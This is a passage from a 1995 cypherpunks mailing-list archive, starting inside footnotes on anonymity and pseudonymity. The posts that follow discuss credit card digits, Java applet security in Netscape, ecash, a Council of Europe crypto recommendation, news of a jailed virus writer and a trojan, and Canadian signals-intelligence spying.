characteristics attributable to an individual, subsets of which may be
more or less relevant in particular contexts (and information about
which may be differentially transmitted in particular messages).
Consider the graffiti again -- even assuming that this may be an
"untraceable" message, in what sense is it an "anonymous" one?  The
reader may obtain a great deal of information relevant to (certain
aspects of) the originator's "identity" -- information about the
originator's political views, perhaps, or familiarity with certain
historical events.  On the other hand, the original message provides no
information (i.e., it is "anonymous") with regard to the originator's
state of domicile (or where the originator went to school, or how many
children the originator may have -- all attributes relevant, in other
contexts, to the question of the originator's "identity").

	  And while we ordinarily think of "identity" in the
context of individual biological persons, that is far too restrictive a
view.  Consider my receipt of an (unsigned) notice from the Department
of Motor Vehicles, or an (unsigned) advertising flyer from my local
McDonald's restaurant.  Each of these messages is "anonymous" in one
sense: I obtain virtually no information about the "identity" of the
(biologically-relevant) individual who typed the notice or otherwise
caused it to be transmitted to me (if indeed there is any such
person).  But it is hardly anonymous in another (and probably more
significant) sense: the letterhead clearly identifies the "identity" of
the more relevant actor (the DMV or McDonald's).  The relevant actor
here, i.e. the DMV or  McDonalds, has a reality unconnected with the
physical "identity" of any of its individual constituents (employees,
officers, etc.); indeed, a notice from the DMV that is mistakenly
placed on non-letterhead stationery (but that is signed by the typist)
surely has less reliable information about the originator's "identity"
than the reverse (i.e., an unsigned note placed on DMV letterhead).

	  4.   Traceability itself is highly context-dependent,
insofar as both the cost of obtaining additional identification
information, and the value of that information in reducing uncertainty
regarding identity, will vary, possibly greatly, from one situation to
another.  It may, for example, be relatively easy for a law enforcement
official to obtain information regarding the identity of the individual
who placed a particular phone call; the same information may be
prohibitively difficult for other individuals to obtain.  Traceability
is also affected by the (1) whether or not relevant identification
information exists in the hands of third parties (i.e., parties other
than the originator and recipient), (2) the third party's duty (or lack
of a duty) to keep the information secret, and (3) the ease with which
disclosure can be legally compelled (by process, subpoena, etc.).

     5.   Anonymity can thus be regarded as a subset of pseudonymity,
with the critical difference being, for my purposes at least, that
pseudonymity allows the accretion of reputational capital in the
pseudonym.

	  6.   This stream may have a high degree of traceability
-- if my electronic mail address is "Postd@law.georgetown.edu," for
example, there at least appears to be information allowing the message
to be traced to a real individual (though query, as always, how
reliable that information may be).  Or it may not -- the use of a
screen name on America Online, or, in the extreme, the use of anonymous
remailers.

	  7.   Examples: the Cancelmoose; the Cyberspace Law
Institute.

     8.   I use "regulation" in the broad sense, to include not only
State action but the "regulatory" activities of e.g., individual system
operators.

	  9.   Note, in this regard, that protecting the "limited
liability" features of pseudonymity does not necessarily mean that
harms imposed on third parties by pseudonymous entities must go
unredressed (as is the consequence of limited liability in the
corporate context); because reputational capital is not transferable,
i.e., is not useful for the purpose of compensating victims of harms
perpetrated by pseudonymous entities, redress can be achieved by
exposing individuals' financial assets, though not necessarily their
personal identities, to risk when the pseudonymous entity acts, and
there are various insurance and authentication/certification regimes
that I will discuss to accomplish this.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 16 Nov 1995 10:45:31 +0800
To: cypherpunks@toad.com
Subject: Re: credit card conventional wisdom (fwd)
Message-ID: <Pine.SOL.3.91.951115182044.18955B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain




Date: Wed, 15 Nov 1995 18:07:25 -0800
From: Tom Wills <twills@eit.COM>
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: credit card conventional wisdom (fwd)

The printed digits above the embossed account number are the first four
digits of the BIN (on Visa cards) or ICA (on MasterCards). They are there
to discourage re-embossing of the card with another account number.

Original Message:

>
>Wow, you learn something every day. I've never in
>my whole life (well, my American Express life,
>over 15 years) noticed those four digits. I've
>never been asked for them by anyone, or noticed
>them being written down, either. Exactly when and
>how are they used?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 16 Nov 1995 10:58:55 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199511151019.CAA18910@jobe.shell.portal.com>
Message-ID: <30AAA306.64CF@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen wrote:
> On a closely related vein, Sun has announced that they are severely
> limiting some functions in HotJava - from Risks-17-45:

[ excerpts from Sun announcement deleted ]

> I had a rather lengthy discussion with a gentleman from Sun at the CSI
> conference last Tuesday night, and this announcement follows many of the
> things we discussed very closely.  This kind of consistency between what
> people say and what the company published is refreshing, and it restores
> my faith in Sun's desire to do things well.  Of course there are still
> some problems left unresolved:

[ more of Sun announcement deleted ]

> I do think that this response by Sun, regardless of the technical merits
> of the particulars, demonstrates a desire to improve protection and a
> willingness to listen.  My compliments for that.

All of these security measures are implemented by Netscape in the
current release.  Specifically, Netscape Navigator 2.0beta2
includes all the applet security precautions detailed in the recent
comp.lang.java posting.  Netscape has been shipping the fixed
applet security model for over a month(since 2.0Beta1), and
Netscape and Sun continue to cooperate and work closely on applet
security issues.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter F Cassidy <pcassidy@world.std.com>
Date: Thu, 16 Nov 1995 07:57:25 +0800
To: "Robert A. Hettinga" <rah@shipwright.com>
Subject: Re: Size of the internet economy?
In-Reply-To: <v02120d00acd0125e6d8b@[199.0.65.105]>
Message-ID: <Pine.3.89.9511151811.C19718-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain





On Wed, 15 Nov 1995, Robert A. Hettinga wrote:

> Lately, I heard (somewhere) that $250 million changed hands directly on
> the net in 1994, mostly credit cards. > > Is this a real number? Where
did it come from? What are estimates for 1995? > Everything on the net is
outside of a lot of traditional metrics and hard to authenticate even if
it were simple to measure. Forrester sites 250 million retail and $90
million in content revenues. By contrast, guys selling a piece of pipe
raked in $1.5 billion. 

Activmedia - www.activmedia.com - does regular surveys. I just got a 
breathless press release for their latest one - "WEB COMMERCE UP 1900%." 
Someone must have bought tickets the lastest George Forman comeback fight 
or something from a ticketron on-line kiosk. . . 

Ole,

Peter

> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 16 Nov 1995 11:09:14 +0800
To: cypherpunks@toad.com
Subject: Re: credit card conventional wisdom (fwd)
In-Reply-To: <Pine.SOL.3.91.951115182044.18955B-100000@chivalry>
Message-ID: <Pine.SOL.3.91.951115184015.18971A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



Further info:

  The AMEX digits aren't part of the standard info- someone I spoke to 
who started off as a grey box programmer said that he thought they were 
just process control. 

  Card-present/Card-not-present can be determined from info on the 
magnetic stripe; for visa cards, this info is stored in a three-digit 
checksum at the end of the discretionary info.

Card Imprints taken with no online authorisation are typically charged a 
transaction fee of 3-6%: with authorisation, 1.5-3%.  ATM card 
transactions  are charged at around $0.10 per transaction.


Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 16 Nov 1995 22:30:00 +0800
To: cypherpunks@toad.com
Subject: e$: Come aaaannnndddd Get it!
Message-ID: <v02120d05acd0346e6c23@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


I'm in the process of scrambling to get the e$ web page set up for e-cash
before the deadline for *no-fee* *commercial* accounts at Mark Twain Bank
this Friday, and who should answer the mail but fellow cypherpunk Lucky
Green.

So, Lucky tells me that *he's* the guy who beat up Chaum/MTB and Co. to
prime the pump for web-vendors by offering *free* signup for e-cash
accounts.  Muchos Kudos to Lucky for making that happen.

Sameer's done it, I'm going to do it, and I'm hoping that everyone who
*can* do it *will*.

Lumpy though MTB may be, they're taking a risk that no one else in the
financial community would, and they deserve whatever support we can give
'em.

If they do it and it works, there will be others. Come on, people, let's
make it work.

Put your e$ where your mouth is, or at least on a hard drive somewhere...

http://www.marktwain.com/ecash.html


Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 16 Nov 1995 11:21:46 +0800
To: rah@shipwright.com
Subject: Re: e$: Come aaaannnndddd Get it!
Message-ID: <01HXORFUEO5Y8WY0P1@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: rah@shipwright.com (Robert Hettinga)

Sameer's done it, I'm going to do it, and I'm hoping that everyone who
*can* do it *will*.

Lumpy though MTB may be, they're taking a risk that no one else in the
financial community would, and they deserve whatever support we can give
'em.

If they do it and it works, there will be others. Come on, people, let's
make it work.

Put your e$ where your mouth is, or at least on a hard drive somewhere...
-------------------
	I will as soon as someone comes up with a _fully_ private digital
cash system and starts using it for something. As I understand it, Chaum's
ecash system is not one (i.e., non-privacy to the sender and of amounts to the
bank). If I'm incorrect, please tell me and I'll set up an account with MTB
immediately (if there's a text-based interface).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip M. Hallam-Baker" <hallam@w3.org>
Date: Thu, 16 Nov 1995 11:24:19 +0800
To: w3t@w3.org
Subject: COE Recommendation No. R (95) 13
Message-ID: <9511160302.AA17272@www18.w3.org>
MIME-Version: 1.0
Content-Type: text/plain


This is that Council of Europe "Ban Crypto" paper. It is of course
nothing like what it is claimed to be 

http://www.privacy.org/pi/intl_orgs/coe/info_tech_1995.html

In particular:

6. The law should permit investigating authorities to avail themselves
of all necessary technical measures that enable the collection of traffic
data in the investigation of crimes. 

"COLLECTION" - not comprehension

8. Criminal procedure laws should be reviewed with a view to making
possible the interception of telecommunications and the collection of
traffic data in the investigation of serious offenses against the
confidentiality, integrity and availability of telecommunications or
computer systems. 

This is simply to fix the German data protection laws and similar, some 
of which might prevent a sysop monitoring a hacker on a system they were 
hacking.


I think the majority of the text is well thought out and very much in
line with what we would want. The piece on encryption is a cop out
to please the French and Dutch. Read it carefully and you will see
it says absolutely nothing.

We have been had again...


Rule number one of politics, always assume that the enemy are 
misrepresenting their case. Council of Europe declarations are almost 
always implemented because they say almost nothing. It is a very
clear statement of some concerns which it would be nice if the 
US authorities understood - separation of search and seizure.

This is not a trend in which Europe is following the US. We are
simply thinking about the effect of technology on law enforcement
rather than reacting to its effects.

Found this written up in cipher, well worth a visit.

http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/


--
Phillip M. Hallam-Baker            Not speaking for anoyone else
hallam@w3.org http://www.w3.org/hypertext/WWW/People/hallam.html
Information Superhighway -----> Hi-ho! Yow! I'm surfing Arpanet!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Thu, 16 Nov 1995 11:41:42 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Java Security Class in Netscape (was: Netscape rewards are an insult)
In-Reply-To: <30AAA306.64CF@netscape.com>
Message-ID: <199511160324.WAA25357@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff wrote:
> All of these security measures are implemented by Netscape in the
> current release.  Specifically, Netscape Navigator 2.0beta2
> includes all the applet security precautions detailed in the recent
> comp.lang.java posting.  Netscape has been shipping the fixed
> applet security model for over a month(since 2.0Beta1), and
> Netscape and Sun continue to cooperate and work closely on applet
> security issues.

All of these are very conservative measures and they seem to be the
best approach for the present. They do remove some of the more
interesting features of Java. Sun commented to me in an interview that
"we would not see a more complex security model until they adding
encryption and digi-sig's, etc."

My question is, can a corporate user replace the security class in
Netscape. I understand that all the class libs are in an external
file. While a virus might exploit this... my reason for asking is for
corporate developers who are building "intra"net systems.. making some
tweaks to the security class would give them the flexibility they need.
Otherwise we have taken much of the fun out of Java. (for good
reasons).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 17 Nov 1995 15:33:14 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Netscape rewards are an insult
In-Reply-To: <30AAA306.64CF@netscape.com>
Message-ID: <199511160333.WAA08987@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
> All of these security measures are implemented by Netscape in the
> current release.  Specifically, Netscape Navigator 2.0beta2
> includes all the applet security precautions detailed in the recent
> comp.lang.java posting.  Netscape has been shipping the fixed
> applet security model for over a month(since 2.0Beta1), and
> Netscape and Sun continue to cooperate and work closely on applet
> security issues.

I've got to note just one thing -- every Netscape 2.0beta2 I've used
has been so full of bugs, and so prone to problems, that I have my
wonders about what the security code looks like. I know, Jeff, that
its all done by different groups -- but the Java stuff I've run in
2.0beta2 is so weirdly different than the supposedly compatible stuff
I've run under HotJava -- especially when it comes to crashing (and it
HAS crashed on me) that I have serious worries about the security of
the thing. I'd say the quality looks very much like an alpha release,
not "beta". I don't want to turn this to Javapunks so I won't say more
on this topic any time soon -- its already been beaten into the
ground.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip M. Hallam-Baker" <hallam@w3.org>
Date: Thu, 16 Nov 1995 11:59:41 +0800
To: cypherpunks@toad.com
Subject: THE FRONT PAGE
Message-ID: <9511160347.AA17470@www18.w3.org>
MIME-Version: 1.0
Content-Type: text/plain


I've edited this down, for fair use reasons, you can get the idea... 

Worth subscribing to this paper BTW.


> The Electronic Telegraph  Thursday 16 November 1995  The Front Page
> 
>  [The Front Page]
> 
> 'Black Baron' computer virus writer jailed for 18 months
> 
> By Robert Uhlig, Technology Correspondent
> 
> Devils in disguise that preyed on computers
> 
>  [Image]  THE man who wrote computer viruses which could cause millions of
> 
> pounds of damage, was jailed for 18 months yesterday.
> 
> Christopher Pile, who called himself the Black Baron, not only spread his own
> viruses, Exeter Crown Court was told, but also distributed across the world his
> program which let other hackers disguise their own viruses.

> The viruses have made the "Black Baron" notorious among British companies.
> Microprose estimated it lost up to 500,000 and used more than 480 staff hours
> checking more than a million files. The computer firm Apricot had to shut down
> and check many of its machines. It found that 22 out of 60 had been infected by
> Pathogen.


-- 
Phillip M. Hallam-Baker            Not speaking for anoyone else
hallam@w3.org http://www.w3.org/hypertext/WWW/People/hallam.html
Information Superhighway -----> Hi-ho! Yow! I'm surfing Arpanet!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: byerr@netcom.com (greeeeeeaaaaaat*)
Date: Thu, 16 Nov 1995 13:10:22 +0800
To: cypherpunks@toad.com
Subject: Professional interview wanted for report
Message-ID: <199511160456.XAA28418@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi.  I'm a freshman at the Thomas Jefferson High School for Science
and Technology in Fairfax County, Virginia.  I am writing a (general)
report on cryptography for school, and I was wondering if anyone on
this list that works with cryptography in their job would be able to
give me a short interview over email.  Thanks a lot!

-- 
Ben Byer      byerr@netcom.com     I am not a bushing
GCS d-- s: a--- C++ UL++++ P++ L++ E+ W+ N++ o K-- w-- !O M-- !V !PS
!PE Y+(++) PGP t+ 5 !X R tv(+) DI+ G e- h! r !y




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: combee@techwood.org (Ben Combee)
Date: Thu, 16 Nov 1995 15:02:58 +0800
To: cypherpunks@toad.com
Subject: Need advice on video
Message-ID: <199511160651.AAA29375@matrix.eden.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello, fellow cypherpunks.  This is my first post here on the global
CP list, although I've been working with the just-reformed Austin
chapter for the last couple of months.

Us Austinites are working on a video for public access television
on cryptography.  We are looking at a one-hour format, similar to
a science program, that will introduce cryptography, its history,
the basic ideas of modern crypto, and what applications there are
for it today and in the future.

Now, this might turn into a series, but for now, we are concentrating
on the overview episode.

What I'm fishing for here are any suggestions for ways to present
some of this content in an interesting video setting.  We've already
decided on doing some algorithm animation, and maybe some simple
moving graphics illustrating the various protocols.  Any ideas you
might have would be appreciated.

BTW, once we finish this and show it locally, we are considering
doing some duplication to send out to interested bodies.  Do you
think there is demand for a good, clear intro to all this in video
form?

Thanks,
-- 
        eebmoC .L nimajneB | Benjamin L. Combee                (REVERSE) 
       gro.doowhcet@eebmoc | combee@techwood.org           (ENGINEERING) 
\eebmoc\ten.kay.www\\:ptth | http://www.yak.net/combee/        (RESERVE)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 17 Nov 1995 05:44:20 +0800
To: cypherpunks@toad.com
Subject: Evil Mail
Message-ID: <199511160420.FAA07007@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



WSJ, November 15, 1995

America Online to Warn Users About Bad E-Mail


Vienna, Va. -- It's a case of myth becoming reality in
the digital age.

America Online Inc. plans to warn subscribers of a
damaging piece of electronic mail that could corrupt
their computers' hard drives.

The existence of the destructive file follows a long-term
hoax that has been dogging AOL for months. Last year, a
user began circulating a warning about a "Good Times"
virus that would crash users' PCs if they so much as read
the piece of electronic mail. AOL, the Federal
Communications Commission and the Pentagon repeatedly had
to label the alleged virus a hoax.

But the new file is all too real. The destructive file,
attached to electronic mail, has been circulated through
the on-line service and the Internet. Receiving the
e-mail wouldn't harm a user's computer, but trying to run
the attached file, known as AOL Gold or "install.exe,"
could render a hard drive inoperable, an AOL spokeswoman
said.

The company said it has notified various
computer-security agencies about the program. AOL also
plans to post a letter for its four million users
strongly urging them to forgo "downloading attached files
from people you don't know."

Security experts fear that such Trojan Horses will
proliferate as programs become easier to attach to
electronic mail and the use of networks grows.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 16 Nov 1995 22:15:05 +0800
To: cypherpunks@toad.com
Subject: Re: CSE gets flak on TV
Message-ID: <199511161400.GAA00778@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 Nov 1995 s1113645@tesla.cc.uottawa.ca wrote:

> For those who care, the Communications Security Establishment has been
> getting some flak for spying on Mex. during NAFTA talks and on Korea to
> help us sell Can. nuke reactors:
> (This rather mirrors the trouble their sister agency, the NSA, has been 
> getting into)
> (sorry the online newscasts were rather vague)

Hmm, actually the news tape is reading a little strange here in Canada.
Not AP, or REUTERS, but simply the Canadian Press newswire.

Let's see ... over the last couple of days, we've had one provincial
Premier resign over "BingoGate" -- kickbacks from bingo games, another
premier is under some pretty heavy fire for some insider trading in a
company he promoted in Hong Kong, (actually his wife got stock she never
had to pay for), while Canada in conjunction with the normally very
neutral Swiss have frozen accounts pertaining to about $20 million or so
in kickbacks from Airbus Industries to a "senior Canadian politician". 

And all these stories ... coincidentally ... broke back to back.

It's almost as though the country is disinfecting itself, or has taken 
one particularly powerful laxative.

But the CSE story is really, really smelly.  The worst of the whole lot. 

I think that there might be more to this than appears on the surface. 
Maybe filling in some details might help our friends on this list.

You listening, Perry???

              *             *            *


On Tue, 14 Nov 1995 s1113645@tesla.cc.uottawa.ca wrote:

>    Electronic snooping part of the game
>    
>    
>    OTTAWA (CP)--Intelligence experts say it's no big secret that Canada's
>    high-tech spy agency snoops on friendly countries for financial gain. 

No big secret??  It was news to me. ;-)

>    Increasingly, intelligence agencies around the world are using their
>    antennas, computers and codebreakers to gather economic information,
>    Wesley Wark, a University of Toronto history professor, said Monday.
>    
>    Some of Canada's largest trading partners--including the United
>    States, France and Japan--comb the airwaves for useful information, so
>    Canada would be foolish not to join the game, said Wark. 

Wark actually continued here.  He said:  "I don't know what a friendly
power in the economic sphere is, exactly, these days.  That seems to be a
very ambiguous term."

(Of course, this is diplo-dodo-speak for something ... I think ... but 
I'm not sure what.)

>    Canada's secretive Communications Security Establishment--an arm of
>    the Defence Department--collects and analyses communications traffic
>    on the activities of foreign states, corporations and people.
>    
>    Jane Shorten, a former CSE employee, told CTV News in an interview
>    Sunday the agency spied on Canada's allies and trading
>    partners--including Mexico and South Korea--by eavesdropping on
>    embassies, consulates and diplomats.

There was also a followup segment, broadcast Monday.  I think that "Jane
Shorten" said that the CSE intercepted telephone conversations and faxes
of Canadians working at FOREIGN embassies in Canada.

But Prime Minister Chretien, in ... New Zealand ... at a meeting of the
Commonwealth did not deny Canada is spying on allies, but he did say that
"This is an organization that works within the law of Canada". 

He also said, "They do not report to me on a daily basis and I cannot make
any comments on if they are spying on anybody.  I don't know.  But they
have the mandate to check a few things around the world.  Probably
somebody is listening to us at this moment." 

Later the Prime Minister said that if any laws have been broken, "somebody
will have to pay the price." 

Ottawa maintains that the CSE, the NSA and their counterparts in Britain, 
Australia, and New Zealand have all agreed not to spy on each other.  He 
also said that the CSE does not target Canadians and scrupulously abides 
by Canadian laws.

"Jane Shorten" said in her Sunday broadcast, "I have lived with this 
information for so long and I just think that it is time that Canada 
knows what the CSE is doing."

"Shorten" worked as an analyst for the CSE from 1986 to 1994 when she was
laid off.  "Shorten" said that the agency spied on Canada's allies and
trading partners, eavesdropping on friendly embassies, consulates, and
diplomats in Canada and around the world. 

Ottawa denies it.  

"Countries like Canada have understandings that they don't carry out these
activities against each other."  Solicitor General Herb Gray said earlier
this year in response to claims that the US Central Intelligence Agency
had spied on the Japanese delegation during auto trade talks in Geneva. 

"Shorten" however replied:  "He does not know what's going on because CSE
is certainly doing that ... I spied on the (South) Korean government for
the Canadian government." 

[I think she was referring to Atomic Energy of Canada's sale of nuclear 
power plants ... possibly ... but I don't know, about AECL.]

Today, it was reported by the deupty prime minister -- since the Prime
Minister is away at an economic conference in Japan -- that there will be
a review of operations to make sure that the Communications Security
Establishment is obeying the law. 

"And if, in fact, there has been illegal activity going on, we'll want to 
deal with that in as public a way as possible," said Sheila Copps.

The Mexican government has presented a diplomatic note to Canada
expressing "surprise and concern" over the report that it was spied on
during the North American free-trade talks. 

South Korea is looking into the matter as well. 

The head of the Canadian Civil Liberties Association wants an independent
committee to oversee CSE operations.  Alan Bovoroy, angered by the
suggestions of spying on Canadians, said a watchdog could put pressure on
politicians to make changes if the CSE steps over the line. 

International diplomacy experts said the allegations of economic espionage
wouldn't damage Ottawa's relations with the countries. 
      
                      --  E N D --


And I guess ... that's all of the news that I've got to this hour.  Except
for one brief note, that Prime Minister Chretien tried to call the States,
but the Government shutdown meant that his call couldn't get through.  
I think he tried to call NASA.

Speaking personally, I just think that something is a bit fishy. I mean 
"Jane Shorten" is a nym if I ever heard one ... probably married to
"Dick Lengthen" or something.  But putting my wry sense of haha, aside 
there are some serious questions.

How does someone cleared for TOP SECRET UMBRA, like our dear "Jane
Shorten" say, "I have lived with this information for so long and I just
think that it is time that Canada knows what CSE is doing."  And then
later say:  "I feel so strongly that its time that people learned what CSE
is all about." 

I mean ... HELLO .... GiGGle TesT ... what on earth did she think the CSE 
did?? Made snowmen and skated on the Rideau Canal??

"Shorten" apparently is quite distraught, over the stepped up CSE
operations in 1991.  Operations targetted at foreign embassies in Canada.
She recalled overhearing conversations of Canadians employed there -- even
one woman's phone call to her doctor.  She was appalled and confronted her
boss, who assured her that the practice was legal. 

I mean, whop dee doo ... "Shorten" overheard a patient/doctor telephone
call that a Canadian made from their place of work -- a foreign embassy.

Did she listen with great intent and intererst, or did she simply try not
to listen??  If "Shorten" was so disraught at listening in on personal
information, she should have closed her ears.  I mean, this is Canada,
what is the problem if we listen to people who work in embassies?? 

The agency IS obligated to destroy information about Canadians it scoops 
up in its electronic net.  A rare exception might be a phone call 
describing a terrorist plot, but that would truly be exceptional, I think.

I mean its not like one big fishing expedition. 

In any event, "Jane Shorten" returned to Canada from New York, this last
evening.  

She told CTV she was aware her revelations could result in
prosecution under the Official Secrets Act but she felt the risk of prison
was worth it. 

And that's the fleshed out version of the story.

I'm just sorry that our Prime Minister is in such a bad position because 
of the timing of this "Jane Shorten's" revelations.  She also revealed 
that Canada spied on Japan.

To think ... Canadian Prime Minister Chretien is a guest of the Japanese
people today.  Talk about some awkward moments.  I mean, what on earth do
you talk about?? 

George Bush and Sushi??




Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Thu, 16 Nov 1995 23:00:00 +0800
To: cypherpunks@toad.com>
Subject: Re: e$: Financial Cryptography for Dogs, pt. 2.  OpenDoc Kitchen, anyone?
Message-ID: <v03003c06acd09c889725@[129.46.82.91]>
MIME-Version: 1.0
Content-Type: text/plain


In Reply to the Message wherein it was written:
[elided]
>I've heard about something called an OpenDoc Kitchen, which is a periodic
>>hack fest put on by Apple for developers of OpenDoc parts where code is
>actually written.
>
>My understanding is that this will be held at Apple, in Cupertino, in
>early December.

That was at Apple in Cupertino, 11-13 NOVEMBER, not December. Whoops...I
heard about it from Jose Carreon earlier and should have spoken up sooner,
but there'll be another.

Attendance by Marcel and/or Felix at such a "kitchen" would be an
*excellent* idea. An OpenDoc-ish model will uncoubtedly be the one many
different OS designers (can you say "redmond?") at least copy someday for
look and feel, so it would be smart for DigiCash/Ecash to be in on the
early payment models. And anyway, Marcel could use a relaxing visit to
sunny California so he can hand-lob a grenade at my house. ;)

>They are especially interested in anyone from Digicash who would like to
>make a digital cash OpenDoc component for Cyberdog, because I've been
>ranting to them about this picture in my head of someone dragging digital
>cash icons onto a register icon in a web browser to pay for a purchase.
[elided]

You're on _exactly_ the right track, Robert. I hope everybody listens to
you. As DC -- or perhaps whatever commercial client development company DC
chooses to license the Ecash technology to for spreading this
valuable-to-humanity technology far beyond the reach of "only" the big
financial companies -- well knows, the version _after_ the next version of
the Ecash client will have to be as easy to use as a smartcard if anyone
really expects to [insert your favorite politically-sensitive verb here]
the worldwide flow of value, perhaps making it more convenient for everyone.

The register idea is an interesting one, but I think the belt coin-changer
interface is more to the point, both graphically, and metaphorically. The
non-expert Person in the Street (maybe even the street-people) will do very
well with something like that.

   dave






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 16 Nov 1995 20:29:25 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: e$: Come aaaannnndddd Get it!
Message-ID: <v02120d01acd0da4ef02b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:57 PM 11/15/95, E. ALLEN SMITH wrote:
>-------------------
>        I will as soon as someone comes up with a _fully_ private digital
>cash system and starts using it for something. As I understand it, Chaum's
>ecash system is not one (i.e., non-privacy to the sender and of amounts to the
>bank). If I'm incorrect, please tell me and I'll set up an account with MTB
>immediately (if there's a text-based interface).

Ahhh. Next year in Jeresalem...

Tell me, are you actually selling something on the net yet? How many
customers do you have?

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Barrett/CheckFree Corporation <Andrew_Barrett@checkfree.com>
Date: Thu, 16 Nov 1995 22:04:48 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: -No Subject-
Message-ID: <9511161654.AA0590@6thstreetcheckfree.com>
MIME-Version: 1.0
Content-Type: text/plain


Over 2000 years ago, Nostradamus predicted that on Tuesday November 14, 1995, 
Phil would say:

><...>Or at least there is a requirement for the
>assistant to enter the extra four digits in certain cases. The precise
>nature of the circumstance when they are required to be card present I
>am not sure (in fact I would bet they vary).

I'm betting your bet is right. When you set up your persona/nym for use with 
the CheckFree wallet, the software does ask for those four, non-embossed 
numbers on the Amex card - which I had never really noticed 'til then. And I 
frequently pass the amex number on the phone for business stuff.

Just last week, I had flowers sent to some partners of ours that we had just 
completed a deal with (sorry...should have odered them over the net), and the 4 
"flat" numbers were not required.

Hmmmm ....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom DeNapoli <denap@isis.com>
Date: Thu, 16 Nov 1995 22:21:29 +0800
To: cypherpunks@toad.com
Subject: Q: blind maildrop anyone?
Message-ID: <199511161409.JAA08809@polyphony.sw.stratus.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

I am not on this mailing list so please reply by email.
It was recommended to me by someone who is on the list that you(s) might
be able to point me to the right place (or page).

What I'd like to do is: establish an email account, other than the one I'm
posting from; preferably on some free email/homepage box, that would encrypt
all cleartext email to hit that account for me at this account.  I have tried,
unsuccessfully to establish this at c2, which offers this service.

My question: has anyone done this successfully at c2, or another location, 
and be willing to point me in the right direction to accomplish this.

thanks,
-Tom 
Tom DeNapoli <denap@isis.com>
26 EC 2B 5A 0B 54 6D EE  1C 3F B6 AE 14 AA 83 87





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Fri, 17 Nov 1995 22:49:52 +0800
To: cypherpunks@toad.com
Subject: Re: 4096 bit strong prime for Diffle-Hellman
In-Reply-To: <Pine.SOL.3.91.951114090156.23102A-100000@orb>
Message-ID: <Pine.SOL.3.91.951116091316.19868C-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


